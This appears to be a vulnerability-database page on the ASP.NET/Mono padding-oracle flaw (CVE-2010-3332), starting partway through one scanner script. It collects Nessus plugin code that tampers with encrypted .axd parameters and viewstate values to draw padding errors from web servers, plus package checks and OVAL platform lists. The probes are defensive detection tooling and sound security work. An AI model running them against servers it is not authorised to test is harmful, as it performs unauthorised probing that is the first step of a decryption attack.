      fixed[strlen(fixed)-1] = raw_string(ord(fixed[strlen(fixed) - 1]) -1);
    
      #re-encode
      fixed = base64url_encode(str:fixed);
    
      #build the final url to request
      final_url = "/" + path + '?d=' + fixed + '&t=' + t;
    
      #Resend the request with the changed padding
      req = http_mk_get_req(port:port, item: final_url, version: 11);
      res = http_send_recv_req(port:port, req:req, fetch404:TRUE, exit_on_fail:TRUE);
    
      # See if the page contained a padding error
      if("adding is invalid" >< res[2])
      {
        return path + " returned a padding error.";
      }
      else if(("CryptographicException" >< res[2]) || ("Bad Data" >< res[2]))
      {
        return path + " returned a runtime error.";
      }
      else if("404" >< res[0])
      {
        exit(0, "The web server on port " + port + " returned a 404 error on " + path + " with invalid padding.");
      }
      else if("302" >< res[0])
      {
        exit(0, "The web server on port " + port + " returned a HTTP Redirect on " + path + " with invalid padding, which may indicate mitigation is in place.");
      }
      else
      {
        return NULL;
      }
    }
    
    function check_axd(port, path)
    {
      local_var req, res, axd, fixed, original, final_url, links, array, item;
      local_var link, result;
      local_var args;
      req = http_mk_get_req(port:port, item:path, version: 11);
      res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE, fetch404:TRUE);
    
      links = egrep(pattern:'\\.axd', string:res[2]);
    
      if(!links)
        return NULL;
    
      array = split(links, sep:'\n');
    
      foreach item(array)
      {
        item = chomp(item);
    
        axd = eregmatch(pattern:'[\'"]([^"\']+\\.axd[^\'"]*)["\']', string:item);
    
        if(!isnull(axd))
        {
          if("http" >!< axd[0])
          {
            link = parse_link(link:axd[1]);
     	args = link['args'];
            result = check_axd_go(port:port, path:link['url'], d:args['d'], t:args['t']);
    
            if(!isnull(result))
            {
              return result;
            }
          }
        }
      }
    }
    
    function check_viewstate_go(port, path, viewstate, event_validation)
    {
      local_var viewstate_bin, fixed, postdata, res;
    
      # make sure we have all the arguments we need
      if(isnull(path) || isnull(viewstate) || isnull(event_validation))
        return NULL;
    
      # Decode
      viewstate_bin = base64_decode(str: viewstate);
    
      # Modify the last character in the string to induce a padding error
      fixed = viewstate_bin;
      fixed[strlen(fixed)-1] = raw_string(ord(fixed[strlen(fixed) - 1]) -1);
    
      # Re-encode
      fixed = base64(str:fixed);
    
      # URL-encode the strings (we only have to worry about three symbols)
      fixed = str_replace(string:fixed, find:"+",replace:"%2b");
      fixed = str_replace(string:fixed, find:"/",replace:"%2f");
      fixed = str_replace(string:fixed, find:"=",replace:"%3d");
      event_validation = str_replace(string:event_validation, find:"+",replace:"%2b");
      event_validation = str_replace(string:event_validation, find:"/",replace:"%2f");
      event_validation = str_replace(string:event_validation, find:"=",replace:"%3d");
    
      postdata = "__VIEWSTATE=" + fixed + "&" + "__EVENTVALIDATION=" + event_validation + "&__VIEWSTATEENCRYPTED=''";
    
      res = http_send_recv3(method: "POST", item: "/", port: port, content_type: "application/x-www-form-urlencoded", data: postdata, exit_on_fail:TRUE, fetch404:TRUE);
    
      if("adding is invalid" >< res[2])
      {
        return "Viewstate at " + path + " returned a padding error.";
      }
      else if("rypto" >< res[2] && 'xception' >< res[2])
      {
        return "Viewstate at " + path + " returned a cryptographic exception.";
      }
      else
      {
        return NULL;
      }
    
    }
    
    function mk_list()
    {
      if (isnull(_FCT_ANON_ARGS[0]))	return make_list();
      else					return make_list(_FCT_ANON_ARGS[0]);
    }
    
    function check_viewstate(port, path)
    {
      local_var req, res, viewstate, event_validation;
    
      req = http_mk_get_req(port:port, item:path, version: 11);
      res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE, fetch404:TRUE);
    
      if("__VIEWSTATE" >!< res[2])
      {
        return NULL;
      }
    
      if("__VIEWSTATEENCRYPTED" >!< res[2])
      {
        return NULL;
      }
    
      viewstate = eregmatch(pattern:'<[^>]+hidden[^>]+name=["\']__VIEWSTATE[^>]+value=["\']([^"\']+)["\']', string:res[2]);
      event_validation = eregmatch(pattern:'<[^>]+hidden[^>]+name=["\']__EVENTVALIDATION[^>]+value=["\']([^"\']+)["\']', string:res[2]);
    
      if(isnull(viewstate) || isnull(event_validation))
      {
        return NULL;
      }
    
      return check_viewstate_go(port:port, path:path, viewstate:viewstate[1], event_validation:event_validation[1]);
    }
    
    var port, axd_files, viewstate_files;
    var axd_count, viewstate_count;
    
    
    port = get_http_port(default:80);
    
    # Get a list of .axd files from the webspider script. If CGI scanning is off,
    # this will be less effective.
    axd_files = get_kb_list("www/" + port + "/content/extensions/axd");
    
    if(isnull(axd_files))
    {
      var result;
      # If we don't have the webmirror extension, check the root folder
      result = check_axd(port:port, path:'/');
    
      if(!isnull(result))
      {
        security_warning(port:port, extra:'\n' + result + '\n');
        exit(0);
      }
    }
    else
    {
      axd_files = make_list(axd_files);
      axd_count = 0;
    
      foreach axd(axd_files)
      {
        var d_list, t_list;
        d_list = get_kb_list("www/" + port + "/cgi-params" + axd + "/d");
        t_list = get_kb_list("www/" + port + "/cgi-params" + axd + "/t");
    
        if(!isnull(d_list) && !isnull(t_list))
        {
          var max, i;
    
          d_list = make_list(d_list);
          t_list = make_list(t_list);
    
          max = max_index(d_list);
    
          for(i = 0; i < max; i++)
          {
            var d, t;
            d = d_list[i];
            t = t_list[i];
            if(isnull(t))
              t = '';
    
            result = check_axd_go(port:port, path:axd, d:d, t:t);
            if(!isnull(result))
            {
              security_warning(port:port, extra:'\n' + result + '\n');
              exit(0);
            }
          }
    
          # Limit the number of files we check
          if(axd_count > 4)
            break;
          axd_count++;
        }
      }
    }
    
    # Get a list of all .cgis. If CGI scanning is turned off, again, this will be more complicated
    viewstate_files = get_kb_list('www/' + port + '/cgi');
    if(isnull(viewstate_files))
    {
      # Check the root path only
      var result;
      result = check_viewstate(port:port, path:'/');
      if(!isnull(result))
      {
        security_warning(port:port, extra:'\n' + result + '\n');
        exit(0);
      }
    }
    else
    {
      viewstate_files = make_list(viewstate_files);
      viewstate_count = 0;
    
      # Search our viewstate files for one with __VIEWSTATEENCRYPTED
      foreach file(viewstate_files)
      {
        var viewstateencrypted;
    
        viewstate_encrypted = get_kb_list("www/" + port + "/cgi-params" + file + "/__VIEWSTATEENCRYPTED");
    
        if(!isnull(viewstate_encrypted))
        {
          var viewstate, event_validation, result;
    
          lVS = mk_list(get_kb_list("www/" + port + "/cgi-params" + file + "/__VIEWSTATE"));
          foreach viewstate (lVS)
          {
            lEV = mk_list(get_kb_list("www/" + port + "/cgi-params" + file + "/__EVENTVALIDATION"));
    	foreach event_validation (lEV)
    	{
    	  result = check_viewstate_go(port:port, path:file, viewstate:viewstate, event_validation:event_validation);
    
    	  if(!isnull(result))
    	  {
    	    security_warning(port:port, extra:'\n' + result + '\n');
    	    exit(0);
    	  }
            }
          }
        }
    
        # Limit the number of files we check
        if(viewstate_count > 4)
          break;
        viewstate_count++;
      }
    
    }
    
    exit(0, "The web server on port " + port + " didn't have a vulnerable .axd file or encrypted viewstate that could be found.");
    
    
  • NASL familyCGI abuses
    NASL idPADDING_ORACLE.NASL
    descriptionBy manipulating the padding on an encrypted string, Nessus was able to generate an error message that indicates a likely
    last seen2020-06-01
    modified2020-06-02
    plugin id50413
    published2010-10-29
    reporterThis script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/50413
    titleCGI Generic Padding Oracle
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    if (description)
    {
      script_id(50413);
      script_version("1.16");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
    
      script_cve_id("CVE-2010-3332");
      script_bugtraq_id(43316, 44285);
      script_xref(name:"MSFT", value:"MS10-070");
      script_xref(name:"MSKB", value:"2416447");
      script_xref(name:"MSKB", value:"2416451");
      script_xref(name:"MSKB", value:"2416468");
      script_xref(name:"MSKB", value:"2416469");
      script_xref(name:"MSKB", value:"2416470");
      script_xref(name:"MSKB", value:"2416471");
      script_xref(name:"MSKB", value:"2416472");
      script_xref(name:"MSKB", value:"2416473");
      script_xref(name:"MSKB", value:"2416474");
      script_xref(name:"MSKB", value:"2418240");
      script_xref(name:"MSKB", value:"2418241");
    
      script_name(english:"CGI Generic Padding Oracle");
      script_summary(english:"Generic padding oracle detection");
    
      script_set_attribute(
        attribute:"synopsis",
        value:
    "A web application hosted on the remote server is potentially prone to
    a padding oracle attack"
      );
    
      script_set_attribute(
        attribute:"description",
        value:
    "By manipulating the padding on an encrypted string, Nessus was able
    to generate an error message that indicates a likely 'padding oracle'
    vulnerability.  Such a vulnerability can affect any application or
    framework that uses encryption improperly, such as some versions of
    ASP.net, Java Server Faces, and Mono. 
    
    An attacker may exploit this issue to decrypt data and recover
    encryption keys, potentially viewing and modifying confidential data. 
    
    Note that this plugin should detect the MS10-070 padding oracle
    vulnerability in ASP.net if CustomErrors are enabled in that."
      );
      script_set_attribute(
        attribute:"solution",
        value: 
    "Update the affected server software, or modify the CGI scripts so
    that they properly validate encrypted data before attempting
    decryption."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"see_also", value:"http://netifera.com/research/");
      script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-070");
      script_set_attribute(attribute:"see_also", value:"https://www.mono-project.com/Vulnerabilities/#ASP.NET_Padding_Oracle");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=623799");
      script_set_attribute(attribute:"vuln_publication_date",value:"2010/09/17");
      script_set_attribute(attribute:"patch_publication_date",value:"2010/09/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/29");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
    
      script_end_attributes();
    
      script_category(ACT_MIXED_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2010-2020 Tenable Network Security, Inc.");
    
      script_dependencie("webmirror.nasl", "http_version.nasl");
      script_require_ports("Services/www", 80);
      script_exclude_keys("Settings/disable_cgi_scanning");
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("byte_func.inc");
    include("url_func.inc");
    include("torture_cgi.inc");
    
    # Define encoding constants
    ENCODING_BASE64 = 1;
    ENCODING_BASE64_URL = 2;
    ENCODING_HEX = 3;
    
    # Define the strings that indicate vulnerability. These will only trigger if they're found by switching
    # the last bit, not the first bit or no bits, so they can be somewhat general. 
    VULN_STRINGS = make_list('padding', 'runtime', 'runtime error', 'server error', 'cryptographicexception', 'crypto');
    
    # Keep track of what we've already tested so we don't repeat checks
    cache = make_list();
    
    # If this is still FALSE at the end of execution, don't display the exit message
    vulnerable = '';
    found_encrypted = FALSE;
    
    # Decode a URL-encoded Base64 string (used by ASP.net). Basically, it's base64 with different
    # symbols, and with an integer for padding instead of equal signs. 
    function base64url_decode(str)
    {
      local_var cstr,padlen;
     
      # strip last char
      cstr = substr(str, 0, strlen(str) - 2);
     
      # num of '=' to pad
      padlen = str[strlen(str) -1];
     
      cstr = str_replace(string:cstr, find:"-",replace:"+");
      cstr = str_replace(string:cstr, find:"_",replace:"/");
      cstr += crap(data:"=",length:padlen);
     
      return base64_decode(str:cstr);
    }
    
    function base64url_encode(str)
    {
      local_var cstr, idx, padchars;
     
      cstr = base64(str:str);
     
      # look for '='
      idx = stridx(cstr,"=");
     
      if(idx != -1)
      {
        padchars  = substr(cstr, idx, strlen(cstr) -1);
     
        cstr      = substr(cstr, 0, idx -1);
        cstr      += strlen(padchars);
      }
      else # no padding
        cstr += "0";
     
      cstr = str_replace(string:cstr, find:"+",replace:"-");
      cstr = str_replace(string:cstr, find:"/",replace:"_");
     
      return cstr;
    }
    
    # Decide if the data given in 'data' is encrypted
    #
    # It turns out that this is difficult to do on short strings, so we are going to 
    # solve this by cheating. Basically, check if the string contains any non-ascii
    # characters (<0x20 or >0x7F). The odds of a 4-character encrypted string having
    # at least one character that falls outside of ASCII is almost 100%. We also 
    # ignore any string longer than 16 bytes, since those are generally too short
    # to be encrypted. 
    function is_encrypted(data)
    {
      local_var non_ascii, i, b;
    
      # Make sure we have a reasonable sized string (encrypted strings tend to be long, and short strings tend to 
      # break our numbers)
      if(strlen(data) < 16)
        return FALSE;
    
      non_ascii = 0;
      for(i = 0; i < strlen(data); i++)
      {
        b = getbyte(blob:data, pos:i);
        if(b < 0x20 || b > 0x7F)
          non_ascii++;
      }
    
      return (non_ascii > (strlen(data) / 4));
    }
    
    # All encrypted CGI arguments have an encoding. Here is what I've found so far:
    # ASP.net .axd files - base64-url
    # ASP.net __VIEWSTATE - base64
    # Mono .axd files - hex
    # Mono __VIEWSTATE - hex
    #
    # We give priority to hex. If a string has an even number of characters in the range 0-9 and A-F, we call
    # it hex and don't try Base64. It's fairly unlikely that a reasonably sized base64 string would be exclusively
    # hex characters. 
    #
    # Base64 and Base64 URL are a little more difficult to distinguish. In *most* cases, we're okay, but once in awhile 
    # it may be decoded incorrectly, in which case two different encodings are returned. 
    function decode(data)
    {
      local_var decoded_str, decoded;
      decoded = make_array();
    
      # Get rid of strings that are all numeric (they probably aren't encoded and they pollute our results)
      if(ereg(string:data, pattern:"^[0-9]+$"))
      {
        return NULL;
      }
    
      # Hex strings are a-fA-F0-9. Although it's technically possible for a base64 string to look like this,
      # it's exceptionally unlikely.
      if(ereg(string:data, pattern:"^([a-fA-F0-9]{2})+$"))
      {
        decoded_str = hex2raw(s:data);
        if(decoded_str)
        {
          decoded[ENCODING_HEX] = decoded_str;
          return decoded;
        }
      }
    
    
      # base64url always has an integer 0, 1, or 2 at the end, and contains letters, numbers, -, and _. The
      # final byte is the number of padding bytes, so the string length with a number of extra bytes equal
      # to the final digit has to be a multiple of 4. 
      if(ereg(string:data, pattern:"^[a-zA-Z0-9_-]+[012]$"))
      {
        # The last letter represents the length
        if(((strlen(data) - 1 + int(data[strlen(data)-1])) % 4) == 0)
        {
          decoded_str = base64url_decode(str:data);
    
          if(decoded_str)
            decoded[ENCODING_BASE64_URL] = decoded_str;
        }
      }
    
      # base64 strings are similar, except they can contain + and /, and end with 0 - 2 '=' signs. They are
      # also a multiple of 4 bytes. 
      if(ereg(string:data, pattern:"^[a-zA-Z0-9/+]+={0,2}$") && (strlen(data) % 4) == 0)
      {
        decoded_str = base64_decode(str:data);
        if(decoded_str)
          decoded[ENCODING_BASE64] = decoded_str;
      }
    
      if(max_index(keys(decoded)) == 0)
        return NULL;
      return decoded;
    }
    
    function encode(data, encoding)
    {
      if(encoding == ENCODING_BASE64_URL)
        return base64url_encode(str:data);
    
      if(encoding == ENCODING_BASE64)
        return base64(str:data);
    
      if(encoding == ENCODING_HEX)
        return hexstr(data);
    
      exit(0, "Unknown encoding type was passed to encode(): " + encoding);
      return NULL;
    }
    
    function go(port, page, new_arg, new_value)
    {
      local_var query, arg_value, res;
      local_var arg, args, arg2;
    
      # First, we need to get all the arguments for the page
      query = page + '?';
    
      # Then get all the arguments, and replace the one we want
      args = get_cgi_arg_list(port: port, cgi: page);
      if (max_index(args) == 0)
        exit(0, "Couldn't get args list"); # Shouldn't ever happen (we already did this check)
    
      foreach arg(args)
      {
        arg2 = replace_cgi_1arg_token(port: port, arg: arg);
        if (arg2 == new_arg)
        {
          query = query + arg2 + "=" + urlencode(str:new_value) + "&";
        }
        else
        {
          arg_value = get_cgi_arg_val_list(port: port, cgi: page, arg: arg);
          if(max_index(arg_value) == 0 || !arg_value[0])
            arg_value = make_list('');
    
          query = query + arg2 + "=" + urlencode(str:arg_value[0]) + "&";
        }
      }
      query = substr(query, 0, strlen(query)-2);
    
      res = http_send_recv3(method:'GET', item:query, port:port, fetch404:TRUE, exit_on_fail:TRUE);
    
      return res;
    }
    
    function do_check(port, page, arg, value, encoding)
    {
      local_var temp, test_values, i;
      local_var result, test_results;
      local_var vuln_string;
    
      test_values = make_list();
      test_results = make_list();
    
      test_values[0] = value;
    
      # The second test is going to change the first bit
      temp = value;
      temp[0] = raw_string(ord(value[0]) ^ 1);
      test_values[1] = temp;
    
      # The first test is going to change the last bit
      temp = value;
      temp[strlen(value)-1] = raw_string(ord(value[strlen(value) - 1]) ^ 1);
      test_values[2] = temp;
    
      # Encode all the values using the given encoding
      for(i = 0; i < max_index(test_values); i++)
      {
        test_values[i] = encode(data:test_values[i], encoding:encoding);
        result = go(port:port, page:page, new_arg:arg, new_value:test_values[i]);
        test_results[i] = tolower(result[0] + result[1] + result[2]);
      }
    
      # If the control test returned an error, then keep going
      if('200' >!< test_results[0])
        return;
    
      # Check if changing the last bit produced a result that changing the first bit didn't. These results are based
      # on a list of error strings. 
      foreach vuln_string(VULN_STRINGS)
      {
        if(vuln_string >< test_results[2] && vuln_string >!< test_results[1] && vuln_string >!< test_results[0])
        {
          vulnerable += '  - ' + page + ' [arg=' + arg + ']\n';
          return TRUE;
        }
      }
    }
    
    function try_check(port, page, arg, value)
    {
      local_var cached;
      local_var decoded, data;
      local_var key;
    
      # Check if we've already looked at this argument
      foreach cached(cache)
        if(cached == value)
          return;
    
      cache = make_list(cache, value);
    
      # Try decoding the argument
      decoded = decode(data:value);
    
      if(decoded)
      {
        # Loop through the possible encryptions
        foreach key(keys(decoded))
        {
          if(is_encrypted(data:decoded[key]))
          {
            found_encrypted = TRUE;
            do_check(port:port, page:page, arg:arg, value:decoded[key], encoding:key);
            if (vulnerable && !thorough_tests) break;
          }
        }
      }
    }
    
    port = get_http_port(default:80, embedded: 0);
    
    # Get a list of all CGI files. If CGI scanning is turned off, we give up and die
    if (get_kb_item("Settings/disable_cgi_scanning"))
      exit(0, "CGI scanning is disabled.");
    
    cgi = get_cgi_list(port: port);
    if (isnull(cgi)) exit(0, "Couldn't find any web applications on the web server on port "+port+".");
    
    # Look for a CGI with an encrypted argument
    foreach file (cgi)
    {
      cgi_args = get_cgi_arg_list(port: port, cgi: file);
      if(max_index(cgi_args) > 0)
      {
        foreach cgi_arg(cgi_args)
        {
          values = get_cgi_arg_val_list(port: port, cgi: file, arg: cgi_arg);
          if(max_index(values) > 0)
          {
            cgi_arg = replace_cgi_1arg_token(port: port, arg: cgi_arg);
            try_check(port:port, page:file, arg:cgi_arg, value:values[0]);
            if (vulnerable && !thorough_tests) break;
          }
        }
      }
    }
    
    if(vulnerable) 
    {
      if (report_verbosity > 0)
      {
        if (max_index(split(vulnerable)) > 1)
        {
          s = "s";
          are = "are";
        }
        else 
        {
          s = "";
          are = "is";
        }
    
        report = 
          '\n' +
          'The following page'+s+' / argument'+s+' '+are+' potentially affected :\n' +
          '\n' +
          vulnerable;
        if (!thorough_tests)
          report += 
            '\n' +
            'Note that Nessus stopped searching after one affected script was found.\n' +
            'For a complete scan, enable the \'Perform thorough tests\' setting and\n' +
            're-scan.\n';
    
        security_warning(port:port, extra:report);
      }
      else security_warning(port);
      exit(0);
    }
    else if(found_encrypted)
      exit(0, "The web server on port " + port + " appears to use encrypted data and appears unaffected.");
    else
      exit(0, "The web server on port " + port + " does not appear to use encrypted data so no checks were performed.");
    
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201206-13.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201206-13 (Mono: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Mono and Mono debugger. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could execute arbitrary code, bypass general constraints, obtain the source code for .aspx applications, obtain other sensitive information, cause a Denial of Service, modify internal data structures, or corrupt the internal state of the security manager. A local attacker could entice a user into running Mono debugger in a directory containing a specially crafted library file to execute arbitrary code with the privileges of the user running Mono debugger. A context-dependent attacker could bypass the authentication mechanism provided by the XML Signature specification. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id59651
    published2012-06-22
    reporterThis script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/59651
    titleGLSA-201206-13 : Mono: Multiple vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 201206-13.
    #
    # The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(59651);
      script_version("1.9");
      script_cvs_date("Date: 2019/08/12 17:35:38");
    
      script_cve_id("CVE-2009-0217", "CVE-2010-3332", "CVE-2010-3369", "CVE-2010-4159", "CVE-2010-4225", "CVE-2010-4254", "CVE-2011-0989", "CVE-2011-0990", "CVE-2011-0991", "CVE-2011-0992");
      script_bugtraq_id(35671, 43316, 44351, 44810, 45051, 45711, 47208);
      script_xref(name:"GLSA", value:"201206-13");
    
      script_name(english:"GLSA-201206-13 : Mono: Multiple vulnerabilities");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-201206-13
    (Mono: Multiple vulnerabilities)
    
        Multiple vulnerabilities have been discovered in Mono and Mono debugger.
          Please review the CVE identifiers referenced below for details.
      
    Impact :
    
        A remote attacker could execute arbitrary code, bypass general
          constraints, obtain the source code for .aspx applications, obtain other
          sensitive information, cause a Denial of Service, modify internal data
          structures, or corrupt the internal state of the security manager.
        A local attacker could entice a user into running Mono debugger in a
          directory containing a specially crafted library file to execute
          arbitrary code with the privileges of the user running Mono debugger.
        A context-dependent attacker could bypass the authentication mechanism
          provided by the XML Signature specification.
      
    Workaround :
    
        There is no known workaround at this time."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/201206-13"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All Mono debugger users should upgrade to the latest version:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=dev-util/mono-debugger-2.8.1-r1'
        All Mono users should upgrade to the latest version:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=dev-lang/mono-2.10.2-r1'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mono");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mono-debugger");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2009/07/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2012/06/21");
      script_set_attribute(attribute:"plugin_publication_date", value:"2012/06/22");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"dev-lang/mono", unaffected:make_list("ge 2.10.2-r1"), vulnerable:make_list("lt 2.10.2-r1"))) flag++;
    if (qpkg_check(package:"dev-util/mono-debugger", unaffected:make_list("ge 2.8.1-r1"), vulnerable:make_list("lt 2.8.1-r1"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Mono");
    }
    
  • NASL familySuSE Local Security Checks
    NASL idSUSE_11_BYTEFX-DATA-MYSQL-110331.NASL
    descriptionThe following security bugs have been fixed : - Mono was vulnerable to a padding oracle attack. (CVE-2010-3332) - Mono loaded shared libraries from the current directory. (CVE-2010-4159)
    last seen2020-06-01
    modified2020-06-02
    plugin id53528
    published2011-04-22
    reporterThis script is Copyright (C) 2011-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/53528
    titleSuSE 11.1 Security Update : Mono (SAT Patch Number 4260)

Oval

accepted2014-08-18T04:00:27.401-04:00
classvulnerability
contributors
  • nameJosh Turpin
    organizationSymantec Corporation
  • nameDragos Prisaca
    organizationSymantec Corporation
  • nameJosh Turpin
    organizationSymantec Corporation
  • nameMaria Mikhno
    organizationALTX-SOFT
  • nameMaria Mikhno
    organizationALTX-SOFT
definition_extensions
  • commentMicrosoft Windows XP (32-bit) is installed
    ovaloval:org.mitre.oval:def:1353
  • commentMicrosoft Windows XP x64 is installed
    ovaloval:org.mitre.oval:def:15247
  • commentMicrosoft Windows Server 2003 (x64) is installed
    ovaloval:org.mitre.oval:def:730
  • commentMicrosoft Windows Server 2003 (ia64) Gold is installed
    ovaloval:org.mitre.oval:def:396
  • commentMicrosoft Windows Vista (32-bit) is installed
    ovaloval:org.mitre.oval:def:1282
  • commentMicrosoft Windows Vista x64 Edition is installed
    ovaloval:org.mitre.oval:def:2041
  • commentMicrosoft Windows Server 2008 (32-bit) is installed
    ovaloval:org.mitre.oval:def:4870
  • commentMicrosoft Windows Server 2008 (64-bit) is installed
    ovaloval:org.mitre.oval:def:5356
  • commentMicrosoft Windows Server 2008 (ia-64) is installed
    ovaloval:org.mitre.oval:def:5667
  • commentMicrosoft .NET Framework 1.1 Service Pack 1 is Installed
    ovaloval:org.mitre.oval:def:1834
  • commentMicrosoft Windows XP (32-bit) is installed
    ovaloval:org.mitre.oval:def:1353
  • commentMicrosoft Windows XP x64 is installed
    ovaloval:org.mitre.oval:def:15247
  • commentMicrosoft Windows Server 2003 (32-bit) is installed
    ovaloval:org.mitre.oval:def:1870
  • commentMicrosoft Windows Server 2003 (x64) is installed
    ovaloval:org.mitre.oval:def:730
  • commentMicrosoft Windows Server 2003 (ia64) Gold is installed
    ovaloval:org.mitre.oval:def:396
  • commentMicrosoft .NET Framework 2.0 Service Pack 2 is installed
    ovaloval:org.mitre.oval:def:6158
  • commentMicrosoft Windows XP (32-bit) is installed
    ovaloval:org.mitre.oval:def:1353
  • commentMicrosoft Windows XP x64 is installed
    ovaloval:org.mitre.oval:def:15247
  • commentMicrosoft Windows Server 2003 (32-bit) is installed
    ovaloval:org.mitre.oval:def:1870
  • commentMicrosoft Windows Server 2003 (x64) is installed
    ovaloval:org.mitre.oval:def:730
  • commentMicrosoft Windows Server 2003 (ia64) Gold is installed
    ovaloval:org.mitre.oval:def:396
  • commentMicrosoft .NET Framework 2.0 Service Pack 1 is installed
    ovaloval:org.mitre.oval:def:6428
  • commentMicrosoft .NET Framework 3.5 Original Release is installed
    ovaloval:org.mitre.oval:def:6689
  • commentMicrosoft Windows XP (32-bit) is installed
    ovaloval:org.mitre.oval:def:1353
  • commentMicrosoft Windows XP x64 is installed
    ovaloval:org.mitre.oval:def:15247
  • commentMicrosoft Windows Server 2003 (32-bit) is installed
    ovaloval:org.mitre.oval:def:1870
  • commentMicrosoft Windows Server 2003 (x64) is installed
    ovaloval:org.mitre.oval:def:730
  • commentMicrosoft Windows Server 2003 (ia64) Gold is installed
    ovaloval:org.mitre.oval:def:396
  • commentMicrosoft Windows Vista (32-bit) is installed
    ovaloval:org.mitre.oval:def:1282
  • commentMicrosoft Windows Vista x64 Edition is installed
    ovaloval:org.mitre.oval:def:2041
  • commentMicrosoft Windows Server 2008 (32-bit) is installed
    ovaloval:org.mitre.oval:def:4870
  • commentMicrosoft Windows Server 2008 (64-bit) is installed
    ovaloval:org.mitre.oval:def:5356
  • commentMicrosoft Windows Server 2008 (ia-64) is installed
    ovaloval:org.mitre.oval:def:5667
  • commentMicrosoft .NET Framework 3.5 Original Release is installed
    ovaloval:org.mitre.oval:def:6689
  • commentMicrosoft Windows XP (32-bit) is installed
    ovaloval:org.mitre.oval:def:1353
  • commentMicrosoft Windows XP x64 is installed
    ovaloval:org.mitre.oval:def:15247
  • commentMicrosoft Windows Server 2003 (32-bit) is installed
    ovaloval:org.mitre.oval:def:1870
  • commentMicrosoft Windows Server 2003 (x64) is installed
    ovaloval:org.mitre.oval:def:730
  • commentMicrosoft Windows Server 2003 (ia64) Gold is installed
    ovaloval:org.mitre.oval:def:396
  • commentMicrosoft Windows Vista (32-bit) is installed
    ovaloval:org.mitre.oval:def:1282
  • commentMicrosoft Windows Vista x64 Edition is installed
    ovaloval:org.mitre.oval:def:2041
  • commentMicrosoft Windows Server 2008 (32-bit) is installed
    ovaloval:org.mitre.oval:def:4870
  • commentMicrosoft Windows Server 2008 (64-bit) is installed
    ovaloval:org.mitre.oval:def:5356
  • commentMicrosoft Windows Server 2008 (ia-64) is installed
    ovaloval:org.mitre.oval:def:5667
  • commentMicrosoft .NET Framework 3.5 SP1 is installed
